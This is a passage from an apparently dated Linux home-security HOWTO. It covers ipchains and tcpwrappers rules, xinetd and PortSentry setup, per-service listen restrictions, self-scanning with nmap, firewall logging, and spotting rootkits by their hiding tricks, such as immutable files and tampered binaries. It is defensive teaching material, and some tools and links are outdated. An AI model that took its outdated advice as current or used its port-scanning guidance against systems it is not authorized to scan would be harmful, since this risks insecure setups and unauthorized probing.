-A input -s 0/0 -d 0/0 25 -p tcp -y -j ACCEPT
-A input -s 0/0 -d 0/0 22 -p tcp -y -j ACCEPT
-A input -s 0/0 -d 0/0 23 -p tcp -y -j ACCEPT
-A input -s 0/0 -d 0/0 -i lo -j ACCEPT
-A input -s 0/0 -d 0/0 -i eth1 -j ACCEPT
-A input -s 127.0.0.1 53 -d 0/0 -p udp -j ACCEPT
-A input -s 0/0 -d 0/0 -p tcp -y -j REJECT
-A input -s 0/0 -d 0/0 -p udp -j REJECT
This is in a format that can be read by the ipchains-restore command.
Consequently, a new or modified set of rules can be saved by running
ipchains-save and redirecting its output to this file. ipchains-restore is
indeed how the ipchains init script processes this file. So for this to work,
the ipchains service must be activated:
+---------------------------------------------------------------------------+
| # chkconfig ipchains on |
| |
| |
+---------------------------------------------------------------------------+
Conversely, if you want to roll your own iptables rules instead, you should
make sure the ipchains init service is disabled. There is also an iptables
init script, that works much the same as the ipchains version. There is just
no support from gnome-lokkit at this time.
-----------------------------------------------------------------------------
5.3. Tcpwrappers (libwrap)
Tcpwrappers provides much the same desired results as ipchains and iptables
above, though it works quite differently. Tcpwrappers actually intercepts the
connection attempt, then examines its configuration files, and decides
whether to accept or reject the request. Tcpwrappers controls access at the
application level, rather than the socket level like iptables and ipchains.
This can be quite effective, and is a standard component on most Linux
systems.
Tcpwrappers consists of the configuration files /etc/hosts.allow and /etc/
hosts.deny. The functionality is provided by the libwrap library.
Tcpwrappers first looks to see if access is permitted in /etc/hosts.allow,
and if so, access is granted. If not in /etc/hosts.allow, the file /etc/
hosts.deny is then checked to see if access is not allowed. If so, access is
denied. Else, access is granted. For this reason, /etc/hosts.deny should
contain only one uncommented line, and that is: ALL: ALL. Access should then
be permitted through entries in /etc/hosts.allow, where specific services are
listed, along with the specific host addresses allowed to access these
services. While hostnames can be used here, use of hostnames opens the
limited possibility for name spoofing.
Tcpwrappers is commonly used to protect services that are started via inetd
(or xinetd). But any program that has been compiled with libwrap support can
also take advantage of it. Just don't assume that all programs have built-in
libwrap support -- they do not. In fact, most probably don't. So we will only
use it in our examples here to protect services started via inetd, and rely
on our packet filtering firewall, or other mechanism, to protect non-(x)inetd
services.
Below is a small snippet from a typical inetd.conf file:
+---------------------------------------------------------------------------+
| # Pop and imap mail services et al |
| # |
| #pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d |
| #pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d |
| #imap stream tcp nowait root /usr/sbin/tcpd imapd |
| # |
| |
| |
+---------------------------------------------------------------------------+
The second to last column is the tcpwrappers daemon -- /usr/sbin/tcpd.
Immediately after is the daemon it is protecting. In this case, POP and IMAP
mail servers. Your distro probably has already done this part for you. For
the few applications that have built-in support for tcpwrappers via the
libwrap library, specifying the daemon as above is not necessary.
We will use the same principles here: default policy is to deny everything,
then open holes to allow the minimal amount of traffic necessary.
So now with your text editor, su to root and open /etc/hosts.deny. If it does
not exist, then create it. It is just a plain text file. We want the
following line:
+---------------------------------------------------------------------------+
| ALL: ALL |
| |
| |
+---------------------------------------------------------------------------+
If it is there already, fine. If not, add it in and then save and close the file.
Easy enough. "ALL" is one of the keywords that tcpwrappers understands. The
format is $SERVICE_NAME : $WHO, so we are denying all connections to all
services here. At least all services that are using tcpwrappers. Remember,
this will primarily be inetd services. See man 5 hosts_access for details on
the syntax of these files. Note the "5" there!
Now let's open up just the services we need, as restrictively as we can, with
a brief example:
+---------------------------------------------------------------------------+
| ALL: 127.0.0.1 |
| sshd,ipop3d: 192.168.1. |
| sshd: .myworkplace.com, hostess.mymomshouse.com |
| |
| |
+---------------------------------------------------------------------------+
The first line allows all "localhost" connections. You will need this. The
second allows connections to the sshd and ipop3d services from IP addresses
that start with 192.168.1., in this case the private address range for our
hypothetical home LAN. Note the trailing ".". It's important. The third line
allows connections to only our sshd daemon from any host associated with
.myworkplace.com. Note the leading "." in this example. And then also, the
single host hostess.mymomshouse.com. In summary, localhost and all our LAN
connections have access to any and all tcpwrappered services on bigcat. But
only our workplace addresses, and our mother can use sshd on bigcat from
outside connections. Everybody else is denied by the default policy in /etc/
hosts.deny.
The types of wild cards above (.myworkplace.com and 192.168.1.) are not
supported by ipchains and iptables, or most other Linux applications for that
matter. Also, tcpwrappers can use hostnames in place of IP addresses, which is
quite handy in some situations. This does not work with ipchains and
iptables.
You can test your tcpwrappers configuration with the included tcpdchk utility
(see the man page). Note that at this time tcpdchk does not work with xinetd,
and may not even be included on systems that use xinetd.
There is nothing wrong with using both tcpwrappers and a packet filtering
firewall like ipchains. In fact, it is recommended to use a "layered"
approach. This helps guard against accidental misconfigurations. In this
case, each connection will be tested by the packet filter rules first, then
tcpwrappers.
Remember to make backup copies before editing system configuration files,
restart the daemon afterward, and then check the logs for error messages.
-----------------------------------------------------------------------------
5.3.1. xinetd
As mentioned, [http://www.xinetd.org] xinetd is an enhanced inetd, and
replaces inetd as of Red Hat 7.0. It has much of the same functionality, with
some notable enhancements. One is that tcpwrappers support is compiled in,
eliminating the need for explicit references to tcpd. This means /etc/
hosts.allow and /etc/hosts.deny are automatically in effect.
Some of xinetd's other enhancements: specify IP address to listen on, which
is a very effective method of access control; limit the rate of incoming
connections and the total number of simultaneous connections; limit services
to specific times of day. See the xinetd and xinetd.conf man pages for more
details.
The syntax is quite different though. An example from /etc/xinetd.d/tftp:
+---------------------------------------------------------------------------+
| service tftp |
| { |
| socket_type = dgram |
| bind = 192.168.1.1 |
| instances = 2 |
| protocol = udp |
| wait = yes |
| user = nobody |
| only_from = 192.168.1.0 |
| server = /usr/sbin/in.tftpd |
| server_args = /tftpboot |
| disable = no |
| } |
| |
| |
+---------------------------------------------------------------------------+
Notice the bind statement. We are only listening on, or "binding" to, the
private, LAN interface here. No outside connections can be made since the
outside port is not even opened. We are also only accepting connections from
192.168.1.0, our LAN. For xinetd's purposes, this denotes any IP address
beginning with "192.168.1". Note that the syntax is different from inetd. The
server statement in this case is the tftp daemon, in.tftpd. Again, this
assumes that libwrap/tcpwrappers support is compiled into xinetd. The user
running the daemon will be "nobody". Yes, there is a user account called
"nobody", and it is wise to run such daemons as non-root users whenever
possible. Lastly, the disable statement is xinetd's way of turning services
on or off. In this case, it is "on". It is enabled here only as an example.
Do NOT run tftp as a public service, as it is unsafe.
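Since disable is how xinetd turns a service on or off, disabling the example
service is a one-line edit. Here is a sketch that applies the change with sed
to an inline copy of the line; on a real system you would edit /etc/xinetd.d/
tftp itself (after backing it up) and then reload xinetd:

```shell
#!/bin/sh
# Sketch: flipping "disable = no" to "disable = yes" to turn a service
# off. sed runs on an inline copy of the line here so the change can be
# inspected safely; apply the same edit to the real /etc/xinetd.d/ file.
snippet='        disable                 = no'
echo "$snippet" | sed 's/= no$/= yes/'
# Then have xinetd re-read its configuration, e.g.: service xinetd reload
```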
-----------------------------------------------------------------------------
5.4. PortSentry
[http://www.psionic.org/products/portsentry.html] Portsentry works quite
differently than the other tools discussed so far. Portsentry does what its
name implies -- it guards ports. Portsentry is configured with the /etc/
portsentry/portsentry.conf file.
Unlike the other applications discussed above, it does this by actually
becoming the listening server on those ports. Kind of like baiting a trap.
Running netstat -taup as root while portsentry is running, will show
portsentry as the LISTENER on whatever ports portsentry is configured for. If
portsentry senses a connection attempt, it blocks it completely. And then
goes a step further and blocks the route to that host to stop all further
traffic. Alternately, ipchains or iptables can be used to block the host
completely. So it makes an excellent tool to stop port scanning of a range of
ports.
But portsentry has limited flexibility as to whether it allows a given
connection. It is pretty much all or nothing. You can define specific IP
addresses that it will ignore in /etc/portsentry/portsentry.ignore. But you
cannot allow selective access to individual ports. This is because only one
server can bind to a particular port at the same time, and in this case that
is portsentry itself. So it has limited usefulness as a stand-alone firewall.
As part of an overall firewall strategy, yes, it can be quite useful. For
most of us, it should not be our first line of defense, and we should only
use it in conjunction with other tools.
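As an illustration, a minimal /etc/portsentry/portsentry.ignore might look
like the following. The LAN address is hypothetical; always include localhost
and your own interface addresses so portsentry never blocks them:

```
# /etc/portsentry/portsentry.ignore -- hosts portsentry will never block.
# One address per line. Include localhost and all local interfaces.
127.0.0.1
192.168.1.1
```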
Suggestions on when portsentry might be useful:
  * As a second layer of defense, behind either ipchains or iptables. Packet
    filtering will catch the packets first, so anything that gets to
    portsentry would indicate a misconfiguration. Do not use it in
    conjunction with inetd services -- it won't work. They will butt heads.
  * As a way to catch full range port scans. Open a pinhole or two in the
    packet filter, and let portsentry catch these and react accordingly.
  * If you are very sure you have no exposed public servers at all, and you
    just want to know who is up to what. But do not assume anything about
    what portsentry is protecting. By default it does not watch all ports,
    and may even leave some very commonly probed ports open. So make sure you
    configure it accordingly. And make sure you have tested and verified your
    setup first, and that nothing is exposed.
All in all, the packet filters make for a better firewall.
-----------------------------------------------------------------------------
5.5. Proxies
The dictionary defines "proxy" as "the authority or power to act on behalf of
another". This pretty well describes software proxies as well. It is an
intermediary in the connection path. As an example, if we were using a web
proxy like "squid" ([http://www.squid-cache.org/] http://www.squid-cache.org
/), every time we browse to a web site, we would actually be connecting to
our locally running squid server. Squid in turn, would relay our request to
the ultimate, real destination. And then squid would relay the web pages back
to us. It is a go-between. Like "firewalls", a "proxy" can refer to either a
specific application, or a dedicated server which runs a proxy application.
Proxies can perform various duties, not all of which have much to do with
security. But the fact that they are an intermediary, makes them a good place
to enforce access control policies, limit direct connections through a
firewall, and control how the network behind the proxy looks to the Internet.
So this makes them strong candidates to be part of an overall firewall
strategy. In fact, they are sometimes used instead of packet filtering
firewalls. Proxy based firewalls probably make more sense where many users
are behind the same firewall, and probably are not high on the list of
components necessary for home based systems.
Configuring and administering proxies can be complex, and is beyond the scope
of this document. The Firewall and Proxy Server HOWTO, [http://tldp.org/HOWTO
/Firewall-HOWTO.html ] http://tldp.org/HOWTO/Firewall-HOWTO.html, has
examples of setting up proxy firewalls. Squid usage is discussed at [http://
squid-docs.sourceforge.net/latest/html/book1.htm] http://
squid-docs.sourceforge.net/latest/html/book1.htm
-----------------------------------------------------------------------------
5.6. Individual Applications
Some servers may have their own access control features. You should check
this for each server application you run. We'll only look at a few of the
common ones in this section. Man pages, and other application specific
documentation, are your friends here. This should be done whether you have
confidence in your firewall or not. Again, layered protection is always
best.
  * BIND - a very common package that provides name server functionality. The
daemon itself is "named". This only requires full exposure to the
Internet if you are providing DNS look ups for one or more domains to the
rest of the world. If you are not sure what this means, you do not need,
or want, it exposed. For the overwhelming majority of us this is the
case. It is a very common crack target.
But it may be installed, and can be useful in a caching only mode. This
does not require full exposure to the Internet. Limit the interfaces on
which it "listens" by editing /etc/named.conf (random example shown):
+---------------------------------------------------------------+
| |
| options { |
| directory "/var/named"; |
| listen-on { 127.0.0.1; 192.168.1.1; }; |
| version "N/A"; |
| }; |
| |
| |
+---------------------------------------------------------------+
The "listen-on" statement is what limits where named listens for DNS
queries. In this example, only on localhost and bigcat's LAN interface.
There is no port open for the rest of the world. It just is not there.
Restart named after making changes.
  * X11 can be told not to allow TCP connections by using the -nolisten tcp
command line option. If using startx, you can make this automatic by
placing alias startx="startx -- -nolisten tcp" in your ~/.bashrc, or the
system-wide file, /etc/bashrc, with your text editor. If using xdm (or
variants such as gdm, kdm, etc), this option would be specified in /etc/
X11/xdm/Xservers (or comparable) as :0 local /usr/bin/X11/X -nolisten
tcp. gdm actually uses /etc/X11/gdm/gdm.conf.
If using xdm (or comparable) to start X automatically at boot, /etc/
inittab can be modified as: xdm -udpPort 0, to further restrict
connections. This is typically near the bottom of /etc/inittab.
  * Recent versions of sendmail can be told to listen only on specified
addresses:
+---------------------------------------------------------------+
| # SMTP daemon options |
| O DaemonPortOptions=Port=smtp,Addr=127.0.0.1, Name=MTA |
| |
| |
+---------------------------------------------------------------+
The above excerpt is from /etc/sendmail.cf, and can be carefully added
with your text editor. The sendmail.mc directive is:
+---------------------------------------------------------------------------+
| |
| dnl This changes sendmail to only listen on the loopback device 127.0.0.1 |
| dnl and not on any other network devices. |
| DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA') |
| |
| |
+---------------------------------------------------------------------------+
Use the mc directive if you would prefer to build a new sendmail.cf, rather
than edit the existing one. Other mail server daemons likely have similar
configuration options. Check your local documentation. As of Red Hat 7.1,
sendmail has compiled in support for tcpwrappers as well.
  * SAMBA connections can be restricted in smb.conf:
+---------------------------------------------------------------+
 | bind interfaces only = true |
| interfaces = 192.168.1. 127. |
| hosts allow = 192.168.1. 127. |
| |
| |
+---------------------------------------------------------------+
This will only open, and allow, connections from localhost (127.0.0.1),
and the local LAN address range. Adjust the LAN address as needed.
  * The CUPS print daemon can be told where to listen for connections. Add to
/etc/cups/cupsd.conf:
+---------------------------------------------------------------+
| Listen 192.168.1.1:631 |
| |
| |
+---------------------------------------------------------------+
This will only open a port at the specified address and port number.
  * xinetd can force daemons to listen only on a specified address with its
"bind" configuration directive. For instance, an internal LAN interface
address. See man xinetd.conf for this and other syntax. There are various
other control mechanisms as well.
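For instance, a hypothetical /etc/xinetd.d/telnet entry, bound to a LAN
interface only (the service and address here are just examples):

```
service telnet
{
    socket_type     = stream
    wait            = no
    user            = root
    server          = /usr/sbin/in.telnetd
    bind            = 192.168.1.1
}
```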
As always, anytime you make system changes, backup the configuration file
first, restart the appropriate daemon afterward, and then check the
appropriate logs for error messages.
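That routine can be sketched like so, using a throwaway file in /tmp as a
stand-in for the real config (substitute e.g. /etc/samba/smb.conf and its
daemon; the restart and log commands are shown commented out):

```shell
# Make a backup copy of the config file before touching it.
conf=/tmp/demo-smb.conf
echo "hosts allow = 192.168.1. 127." > "$conf"   # stand-in config content
cp -p "$conf" "$conf.bak"                        # backup first, always
# ...now edit $conf with your text editor, then restart and watch the logs:
# /etc/rc.d/init.d/smb restart && tail /var/log/messages
```

If the edit goes wrong, the .bak copy gets you back to a known-good state.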
-----------------------------------------------------------------------------
5.7. Verifying
The final step after getting your firewall in place, is to verify that it is
doing what you intended. You would be wise to do this anytime you make even
minor changes to your system configuration.
So how to do this? There are several things you can do.
For our packet filters like ipchains and iptables, we can list all our rules,
chains, and associated activity with iptables -nvL | less (substitute
ipchains if appropriate). Open your xterm as wide as possible to avoid
wrapping long lines.
This should give you an idea if your chains are doing what you think they
should. You may want to perform some of the on-line tasks you normally do
first: open a few web pages, send and retrieve mail, etc. This will, of
course, not give you any information on tcpwrappers or portsentry. tcpdchk
can be used to verify tcpwrappers configuration (except with xinetd).
And then, scan yourself. nmap is the scanning tool of choice and is included
with recent Red Hat releases, or from [http://www.insecure.org/nmap/
nmap_download.html] http://www.insecure.org/nmap/nmap_download.html. nmap is
very flexible, and essentially is a "port prober". In other words, it looks
for open ports, among other things. See the nmap man page for details.
If you do run nmap against yourself (e.g. nmap localhost), this should tell
you what ports are open -- and visible locally only! Which hopefully by now,
is quite different from what can be seen from the outside. So, scan yourself,
and then find a trusted friend, or site (see the Links section), to scan you
from the outside. Make sure you are not violating your ISPs Terms of Service
by port scanning. It may not be allowed, even if the intentions are
honorable. Scanning from outside is the best way to know how the rest of the
world sees you. This should tell you how well that firewall is working. See
the nmap section in the Appendix for some examples on nmap usage.
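As a rough idea of usage (the LAN address is an example, and of course only
scan hosts you are authorized to scan):

```
# Scan your own machine first, then a full TCP port range on the LAN address:
nmap localhost
nmap -p 1-65535 192.168.1.1
```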
One caveat on this: some ISPs may filter some ports, and you will not know
for sure how well your firewall is working. Conversely, they may make it look
like certain ports are open by using web, or other, proxies. The scanner may
see the web proxy at port 80 and mis-report it as an open port on your
system.
Another option is to find a website that offers full range testing. [http://
www.hackerwhacker.com] http://www.hackerwhacker.com is one such site. Make
sure that any such site is not just scanning a relatively few well known
ports.
Repeat this procedure with every firewall change, every system upgrade or new
install, and when any key components of your system changes.
You may also want to enable logging all the denied traffic. At least
temporarily. Once the firewall is verified to be doing what you think it
should, and if the logs are hopelessly overwhelming, you may want to disable
logging.
If relying on portsentry at all, please read the documentation. Depending on
your configuration it will either drop the route to the scanner, or implement
a ipchains/iptables rule doing the same thing. Also, since it "listens" on
the specified ports, all those ports will show as "open". A false alarm in
this case.
-----------------------------------------------------------------------------
5.8. Logging
Linux does a lot of logging. Usually to more than one file. It is not always
obvious what to make of all these entries -- good, bad or indifferent?
Firewall logs tend to generate a fair amount of each. Of course, you are
wanting to stop only the "bad", but you will undoubtedly catch some harmless
traffic as well. The 'net has a lot of background noise.
In many cases, knowing the intentions of an incoming packet is almost
impossible. Attempted intrusion? Misbehaved protocol? Mis-typed IP address?
Conclusions can be drawn based on factors such as destination port, source
port, protocol, and many other variables. But there is no substitute for
experience in interpreting firewall logs. It is a black art in many cases.
So do we really need to log? And how much should we be trying to log? Logging
is good in that it tells us that the firewall is functional. Even if we don't
understand much of it, we know it is doing "something". And if we have to, we
can dig into those logs and find whatever data might be called for.
On the other hand, logging can be bad if it is so excessive, it is difficult
to find pertinent data, or worse, fills up a partition. Or if we overreact
and take every last entry as an all out assault. Some perspective is a great
benefit, but something that new users lack almost by definition. Again, once
your firewall is verified, and you are perplexed or overwhelmed, home desktop
users may want to disable as much logging as possible. Anyone with greater
responsibilities should log, and then find ways to extract the pertinent data
from the logs by filtering out extraneous information.
Not sure where to look for log data? The two logs to keep an eye on are /var/
log/messages and /var/log/secure. There may be other application specific
logs, depending on what you have installed, or using. FTP, for instance, logs
to /var/log/xfer on Red Hat.
Portsentry and tcpwrappers do a certain amount of logging that is not
adjustable. xinetd has logging enhancements that can be turned on. Both
ipchains and iptables, on the other hand, are very flexible as to what is
logged.
For ipchains the -l option can be added to any rule. iptables uses the -j LOG
target, and requires its own, separate rule instead. iptables goes a few
steps further and allows customized log entries, and rate limiting. See the
man page. Presumably, we are more interested in logging blocked traffic, so
we'd confine logging to only our DENY and REJECT rules.
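As a sketch of the iptables approach (the rule details are illustrative, not a
drop-in policy):

```
# Log unsolicited inbound TCP connection attempts, rate limited, then drop.
# The LOG rule must come first, since LOG does not terminate rule traversal.
iptables -A INPUT -p tcp --syn -m limit --limit 5/minute \
         -j LOG --log-prefix "INPUT DROP: "
iptables -A INPUT -p tcp --syn -j DROP
```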
So whether you log, and how much you log, and what you do with the logs, is
an individual decision, and probably will require some trial and error so
that it is manageable. A few auditing and analytical tools can be quite
helpful:
Some tools will monitor your logs for you and notify you when necessary.
These likely will require some configuration, and trial and error, to get
the most out of them:
  * A nice log entry analyzer for ipchains and iptables from Manfred Bartz:
[http://www.logi.cc/linux/NetfilterLogAnalyzer.php3] http://www.logi.cc/
linux/NetfilterLogAnalyzer.php3. What does all that stuff mean anyway?
  * LogSentry (formerly logcheck) is available from [http://www.psionic.org/
products/logsentry.html] http://www.psionic.org/products/logsentry.html,
the same group that is responsible for portsentry. LogSentry is an all
purpose log monitoring tool with a flexible configuration, that handles
multiple logs.
  * [http://freshmeat.net/projects/firelogd/] http://freshmeat.net/projects/
firelogd/, the Firewall Log Daemon from Ian Jones, is designed to watch,
and send alerts on iptables or ipchains logs data.
  * [http://freshmeat.net/projects/fwlogwatch/] http://freshmeat.net/projects
/fwlogwatch/ by Boris Wesslowski, is a similar idea, but supports more
log formats.
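Even without such tools, ordinary text utilities can pull a quick summary out
of netfilter log entries. A sketch, run against a fabricated sample (real
kernel log lines carry more fields than shown here):

```shell
# Build a small sample in syslog style, then count hits per source address.
cat > /tmp/messages.sample <<'EOF'
Jun  1 12:00:01 bigcat kernel: IN=eth0 SRC=10.0.0.5 DST=192.168.1.1 PROTO=TCP DPT=23
Jun  1 12:00:02 bigcat kernel: IN=eth0 SRC=10.0.0.5 DST=192.168.1.1 PROTO=TCP DPT=111
Jun  1 12:00:03 bigcat kernel: IN=eth0 SRC=10.0.0.9 DST=192.168.1.1 PROTO=UDP DPT=53
EOF
grep -o 'SRC=[0-9.]*' /tmp/messages.sample | sort | uniq -c | sort -rn
```

The busiest sources float to the top, which is usually the first question
worth asking of a firewall log.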
-----------------------------------------------------------------------------
5.9. Where to Start
Let's take a quick look at where to run our firewall scripts from.
Portsentry can be run as an init process, like other system services. It is
not so important when this is done. Tcpwrappers will be invoked automatically
by inetd or xinetd, so not to worry there either.
But the packet filtering scripts will have to be started somewhere. And many
scripts will have logic that uses the local IP address. This will mean that
the script must be started after the interface has come up and been assigned
an IP address. Ideally, this should be immediately after the interface is up.
So this depends on how you connect to the Internet. Also, for protocols like
PPP or DHCP that may be dynamic, and get different IP's on each re-connect,
it is best to have the scripts run by the appropriate daemon.
Red Hat uses /etc/ppp/ip-up.local for any user defined, local PPP
configuration. If this file does not exist, create it, and make it executable
(chmod +x). Then with your text editor, add a reference to your firewall
script.
For DHCP, it depends on which client. dhcpcd will execute /etc/dhcpcd/dhcpcd-
<interface>.exe (e.g. dhcpcd-eth0.exe) whenever a lease is obtained or
renewed. So this is where to put a reference to your firewall script. For
pump (the default on Red Hat), the main configuration file is /etc/pump.conf.
Pump will run whatever script is defined by the "script" statement any time
there is a new or renewed lease:
script /usr/local/bin/ipchains.sh
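Such a script can stay interface-agnostic by reading the address at run time,
which is what makes it safe to call from ip-up.local or a DHCP client hook.
A minimal sketch, shown as a dry run that prints the rules instead of loading
them (the interface name, address and rule are examples only):

```shell
# Discover (or here, default) the interface and address at run time, so the
# same script works after every PPP/DHCP re-connect.
IFACE=${IFACE:-eth0}
IPADDR=${IPADDR:-192.168.1.1}   # a real script would parse "ip addr show $IFACE"
echo "iptables -A INPUT -i $IFACE -d $IPADDR -m state --state NEW -j DROP"
```

Replacing the echo with the real command (run as root) turns the dry run into
a working rule.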
If you have a static IP address (i.e. it never changes), the placement is not
so important, as long as the script runs before the interface comes up.
-----------------------------------------------------------------------------
5.10. Summary and Conclusions for Step 3
In this section we looked at various components that might be used to
construct a "firewall". And learned that a firewall is as much a strategy and
combination of components, as it is any one particular application or
component. We looked at a few of the most commonly available applications
that can be found on most, if not all, Linux systems. This is not a
definitive list.
This is a lot of information to digest all at one time, and too much to expect
anyone to understand it all. Hopefully this can be used as a starting point, and
for future reference as well. The packet filter firewall examples can be used
as starting points as well. Just use your text editor, cut and paste into a
file with an appropriate name, and then run chmod +x against it to make it
executable. Some minor editing of the variables may be necessary. Also look
at the Links section for sites and utilities that can be used to generate a
custom script. This may be a little less daunting.
Now we are done with Steps 1, 2 and 3. Hopefully by now you have already
instituted some basic measures to protect your system(s) from the various and
sundry threats that lurk on networks. If you haven't implemented any of the
above steps yet, now is a good time to take a break, go back to the top, and
have at it. The most important steps are the ones above.
A few quick conclusions...
"What is best: iptables, ipchains, tcpwrappers, or portsentry?" The quick
answer is that iptables can do more than any of the others. So if you are
using a 2.4 kernel, use iptables. Then, ipchains if using a 2.2 kernel. The
long answer is "it just depends on what you are doing and what the objective
is". Sorry. The other tools all have some merit in any given situation, and
all can be effective in the right situation.
"Do I really need all these packages?" No, but please combine more than one
approach, and please follow all the above recommendations. iptables by itself
is good, but in conjunction with some of the other approaches, we are even
stronger. Do not rely on any single mechanism to provide a security blanket.
"Layers" of protection is always best. As are sound administrative practices.
The best iptables script in the world is but one piece of the puzzle, and
should not be used to hide other system weaknesses.
"If I have a small home LAN, do I need to have a firewall on each computer?"
No, not necessary as long as the LAN gateway has a properly configured
firewall. Unwanted traffic should be stopped at that point. And as long as
this is working as intended, there should be no unwanted traffic on the LAN.
But, by the same token, doing this certainly does no harm. And on larger LANs
that might be mixed platform, or with untrusted users, it would be advisable.
-----------------------------------------------------------------------------
6. Intrusion Detection
This section will deal with how to get early warning, how to be alerted after
the fact, and how to clean up from intrusion attempts.
-----------------------------------------------------------------------------
6.1. Intrusion Detection Systems (IDS)
Intrusion Detection Systems (IDS for short) are designed to catch what might
have gotten past the firewall. They can either be designed to catch an active
break-in attempt in progress, or to detect a successful break-in after the
fact. In the latter case, it is too late to prevent any damage, but at least
we have early awareness of a problem. There are two basic types of IDS: those
protecting networks, and those protecting individual hosts.
For host based IDS, this is done with utilities that monitor the filesystem
for changes. System files that have changed in some way, but should not
change -- unless we did it -- are a dead give away that something is amiss.
Anyone who gets in, and gets root, will presumably make changes to the system
somewhere. This is usually the very first thing done. Either so he can get
back in through a backdoor, or to launch an attack against someone else. In
which case, he has to change or add files to the system.
This is where tools like tripwire ([http://www.tripwire.org] http://
www.tripwire.org) play a role. Tripwire is included beginning with Red Hat
7.0. Such tools monitor various aspects of the filesystem, and compare them
against a stored database. And can be configured to send an alert if any
changes are detected. Such tools should only be installed on a known "clean"
system.
For home desktops and home LANs, this is probably not an absolutely necessary
component of an overall security strategy. But it does give peace of mind,
and certainly does have its place. So as to priorities, make sure the Steps
1, 2 and 3 above are implemented and verified to be sound, before delving
into this.
We can get somewhat the same results with rpm -Va, which will verify all
packages, but without all the same functionality. For instance, it will not
notice new files added to most directories. Nor will it detect files that
have had the extended attributes changed (e.g. chattr +i, man chattr and man
lsattr). For this to be helpful, it needs to be done after a clean install,
and then each time any packages are upgraded or added. Example:
+---------------------------------------------------------------------------+
| |
| # rpm -Va > /root/system.checked |
| |
| |
+---------------------------------------------------------------------------+
Then we have a stored system snapshot that we can refer back to.
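Later on, a fresh run can be diffed against that snapshot; anything new in the
output is a change since the baseline. A sketch, using two small sample files
in place of real rpm -Va output:

```shell
# Stand-ins for the stored baseline and a later verification run.
printf 'S.5....T c /etc/hosts\n' > /tmp/system.checked
printf 'S.5....T c /etc/hosts\nS.5....T c /etc/passwd\n' > /tmp/system.now
# Lines unique to the new run are changes made since the snapshot.
diff /tmp/system.checked /tmp/system.now || true
```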
Another idea is to run chkrootkit ([http://www.chkrootkit.org/] http://
www.chkrootkit.org/) as a weekly cron job. This will detect common "rootkits".
-----------------------------------------------------------------------------
6.2. Have I Been Hacked?
Maybe you are reading this because you've noticed something "odd" about your
system, and are suspicious that someone has gotten in? This can be a clue.
The first thing an intruder typically does is install a "rootkit". There are
many prepackaged rootkits available on the Internet. The rootkit is
essentially a script, or set of scripts, that makes quick work of modifying
the system so the intruder is in control, and he is well hidden. He does this
by installing modified binaries of common system utilities and tampering with
log files. Or by using special kernel modules that achieve similar results.
So common commands like ls may be modified so as to not show where he has his
files stored. Clever!
A well designed rootkit can be quite effective. Nothing on the system can
really be trusted to provide accurate feedback. Nothing! But sometimes the
modifications are not as smooth as intended and give hints that something is
not right. Some things that might be warning signs:
  * Login acts weird. Maybe no one can login. Or only root can login. Any
login weirdness at all should be suspicious. Similarly, any weirdness
with adding or changing passwords.
Weirdness with other system commands (e.g. top or ps) should be cause for
concern as well.
  * System utilities are slower, or awkward, or show strange and unexpected
results. Common utilities that might be modified are: ls, find, who, w,
last, netstat, login, ps, top. This is not a definitive list!
  * Files or directories named "..." or ".. " (dot dot space). A sure bet in
this case. Files with haxor looking names like "r00t-something".
  * Unexplained bandwidth usage, or connections. Script kiddies have a
fondness for IRC, so such connections should raise a red flag.
  * Logs that are missing completely, or missing large sections. Or a sudden
change in syslog behavior.
  * Mysterious open ports, or processes.
  * Files that cannot be deleted or moved. Some rootkits use chattr to make
files "immutable", or not changeable. This kind of change will not show up
with ls, or rpm -V, so the files look normal at first glance. See the man
pages for chattr and lsattr on how to reverse this. Then see the next
section below on restoring your system as the jig is up at this point.
This is becoming a more and more common script kiddie trick. In fact, one
quick test to run on a suspected system (as root):
+---------------------------------------------------------------+
| /usr/bin/lsattr `echo $PATH | tr ':' ' '` | grep i-- |
| |
+---------------------------------------------------------------+
This will look for any "immutable" files in root's PATH, which is almost
surely a sign of trouble since no standard distributions ship files in
this state. If the above command turns up anything at all, then plan on
completely restoring the system (see below). A quick sanity check:
+---------------------------------------------------------------+
| # chattr +i /bin/ps |
| # /usr/bin/lsattr `echo $PATH | tr ':' ' '` | grep "i--" |
| ---i---------- /bin/ps |
| # chattr -i /bin/ps |
| |
+---------------------------------------------------------------+
This is just to verify the system is not tampered with to the point that
lsattr is completely unreliable. The third line is exactly what you
should see.
  * Indications of a "sniffer", such as log messages of an interface entering
"promiscuous" mode.
  * Modifications to /etc/inetd.conf, rc.local, rc.sysinit or /etc/passwd.
Especially, any additions. Try using cat or tail to view these files.
Additions will most likely be appended to the end. Remember though such
changes may not be "visible" to any system tools.
Sometimes the intruder is not so smart and forgets about root's
.bash_history, or cleaning up log entries, or even leaves strange, leftover
files in /tmp. So these should always be checked too. Just don't necessarily
expect them to be accurate. Often such left behind files, or log entries,
will have obvious script kiddie sounding names, e.g. "r00t.sh".
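A sweep for the suspicious "..." and ".. " names mentioned earlier can be
sketched with find. A demo directory is used here; on a real system you might
start at /tmp, /var/tmp and /dev:

```shell
# Plant a demo directory named "..." and then hunt for such names.
mkdir -p '/tmp/ids-demo/...'
find /tmp/ids-demo -name '...' -o -name '.. '
```

Any hit outside a test like this one deserves a very close look.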
Packet sniffers, like tcpdump ([http://www.tcpdump.org] http://
www.tcpdump.org), might be useful in finding any uninvited traffic.
Interpreting sniffer output is probably beyond the grasp of the average new
user. snort ([http://www.snort.org] http://www.snort.org), and ethereal
([http://www.ethereal.com] http://www.ethereal.com), are also good. Ethereal
has a GUI.
As mentioned, a compromised system will undoubtedly have altered system
binaries, and the output of system utilities is not to be trusted. Nothing on
the system can be relied upon to be telling you the whole truth.
Re-installing individual packages may or may not help since it could be
system libraries or kernel modules that are doing the dirty work. The point
here is that there is no way to know with absolute certainty exactly what
components have been altered.
We can use rpm -Va | less to attempt to verify the integrity of all packages. But
again there is no assurance that rpm itself has not been tampered with, or
the system components that RPM relies on.
If you have pstree on your system, try this instead of the standard ps.
Sometimes the script kiddies forget about this one. No guarantees though that
this is accurate either.
You can also try querying the /proc filesystem, which contains everything the
kernel knows about processes that are running:
+---------------------------------------------------------------------------+
| |
| # cat /proc/*/stat | awk '{print $1,$2}' |
| |
| |
+---------------------------------------------------------------------------+
This will provide a list of all processes and PID numbers (assuming a
malicious kernel module is not hiding this).
Another approach is to visit [http://www.chkrootkit.org] http://
www.chkrootkit.org, download their rootkit checker, and see what it says.
